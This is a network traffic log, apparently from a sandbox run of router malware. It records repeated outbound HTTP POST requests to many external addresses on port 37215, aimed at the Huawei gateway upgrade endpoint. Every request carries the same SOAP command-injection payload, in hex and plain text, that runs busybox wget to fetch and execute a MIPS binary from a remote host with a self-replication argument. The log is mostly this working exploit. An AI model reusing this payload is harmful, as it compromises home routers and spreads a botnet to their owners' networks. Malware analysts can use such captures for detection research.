                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1776192.168.2.2345998197.27.223.12137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.584438086 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1777192.168.2.236065073.90.185.5737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.584438086 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1778192.168.2.235618641.233.244.18537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.584523916 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1779192.168.2.2357182157.100.36.14237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.584564924 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1780192.168.2.2358150157.73.241.16037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.584579945 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1781192.168.2.2359002157.84.57.14937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.584667921 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1782192.168.2.233299012.25.101.10437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.584670067 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1783192.168.2.2355858157.242.126.22837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.584676027 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1784192.168.2.2339956197.153.17.5537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.585195065 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1785192.168.2.2351612157.112.36.21937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.585195065 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
